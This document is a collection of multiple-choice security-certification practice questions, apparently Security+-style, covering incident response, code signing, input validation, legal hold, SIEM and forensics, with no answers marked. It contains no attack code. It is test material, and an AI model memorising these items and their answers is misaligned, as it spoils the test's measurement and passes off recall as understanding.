A company wants to verify that the software the company is deploying came from the vendor the

company purchased the software from. Which of the following is the best way for the company to
confirm this information?
A. Validate the code signature.
B. Execute the code in a sandbox.
C. Search the executable for ASCII strings.
D. Generate a hash of the files

A security analyst is investigating an application server and discovers that software on the server is
behaving abnormally. The software normally runs batch jobs locally and does not generate traffic,
but the process is now generating outbound traffic over random high ports. Which of the following
vulnerabilities has likely been exploited in this software?
A. Memory injection
B. Race condition
C. Side loading
D. SQL injection
An organization recently updated its security policy to include the following statement:
Regular expressions are included in source code to remove special characters such as $, |, ;. &, `, and
? from variables set by forms in a web application.
Which of the following best explains the security technique the organization adopted by making this
addition to the policy?
A. Identify embedded keys
B. Code debugging
C. Input validation
D. Static code analysis
 A security manager created new documentation to use in response to various types of security
incidents. Which of the following is the next step the manager should take?
A. Set the maximum data retention policy.
B. Securely store the documents on an air-gapped network.
C. Review the documents' data classification policy.
D. Conduct a tabletop exercise with the team.

Which of the following is the phase in the incident response process when a security analyst reviews
roles and responsibilities?
A.Preparation
B. Recovery
C. Lessons learned
D. Analysis
Which of the following exercises should an organization use to improve its incident response
process?
A. Tabletop
B. Replication
C. Failover
D. Recovery

During a recent breach, employee credentials were compromised when a service desk employee
issued an MFA bypass code to an attacker who called and posed as an employee. Which of the
following should be used to prevent this type of incident in the future?
A. Hardware token MFA
B. Biometrics
C. Identity proofing
D. Least privilege
A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks.
SIEM alerts have not yet been configured. Which of the following best describes what the security
analyst should do to identify this behavior?
A. [Digital forensics
B. E-discovery
C. Incident response
D. Threat hunting

Which of the following describes the reason root cause analysis should be conducted as part of
incident response?
A. To gather loCs for the investigation
B. To discover which systems have been affected
C. To eradicate any trace of malware on the network
D. To prevent future incidents of the same nature
A security administrator needs a method to secure data in an environment that includes some form
of checks so that the administrator can track any changes. Which of the following should the
administrator set up to achieve this goal?
A. SPF
B. GPO
C. NAC
D. FIM

Which of the following incident response activities ensures evidence is properly handied?
A. E-discovery
B. Chain of custody
C. Legal hold
D. Preservation
After a company was compromised, customers initiated a lawsuit. The company's attorneys have
requested that the security team initiate a legal hold in response to the lawsuit. Which of the
following describes the action the security team will most likely be required to take?
A. Retain the emails between the security team and affected customers for 30 days.
B. Retain any communications related to the security breach until further notice.
C. Retain any communications between security members during the breach response.
D. Retain all emails from the company to affected customers for an indefinite period of time.

An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?
A. Compromise
B. Retention
C. Analysis
D. Transfer
E. Inventory
During an investigation, an incident response team attempts to understand the source of an incident.
Which of the following incident response activities describes this process?
A. Analysis
B. Lessons learned
C. Detection
D. Containment

After a recent ransomware attack on a company's system, an administrator reviewed the log files.
Which of the following control types did the administrator use?
A. Compensating
B. Detective
C. Preventive
D. Corrective
After an audit, an administrator discovers all users have access to confidential data on a file server.
Which of the following should the administrator use to restrict access to the data quickly?
A. Group Policy
B. Content filtering
C. Data loss prevention
D. Access control lists

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic
coming from an employee’s corporate laptop. The security analyst has determined that additional
data about the executable running on the machine is necessary to continue the investigation. Which
of the following logs should the analyst use as a data source?
A. Application
B. IPS/IDS
C. Network
D. Endpoint
A newly appointed board member with cybersecurity knowledge wants the board of directors to
receive a quarterly report detailing the number of incidents that impacted the organization. The
systems administrator is creating a way to present the data to the board of directors. Which of the
following should the systems administrator use?
A. Packet captures
B. Vulnerability scans
C. Metadata
D. Dashboard

Which of the following describes a security alerting and monitoring tool that collects system,
application, and network logs from multiple sources in a centralized system?
A. SIEM
B. DLP
C. IDS
D. SNMP
A security analyst locates a potentially malicious video file on a server and needs to identify both the
creation date and the file's creator. Which of the following actions would most likely give the security
analyst the information required?
A. Obtain the file's SHA-256 hash.
B. Use hexdump on the file's contents.
C. Check endpoint logs.
D. Query the file's metadata

A Chief Information Security Officer wants to monitor the company's servers for SQLi attacks and
allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow
traffic monitoring. Which of the following strategies would best accomplish this goal?
A. Logging all NetFlow traffic into a SIEM
B. Deploying network traffic sensors on the same subnet as the servers
C. Logging endpoint and OS-specific security logs
D. Enabling full packet capture for traffic entering and exiting the servers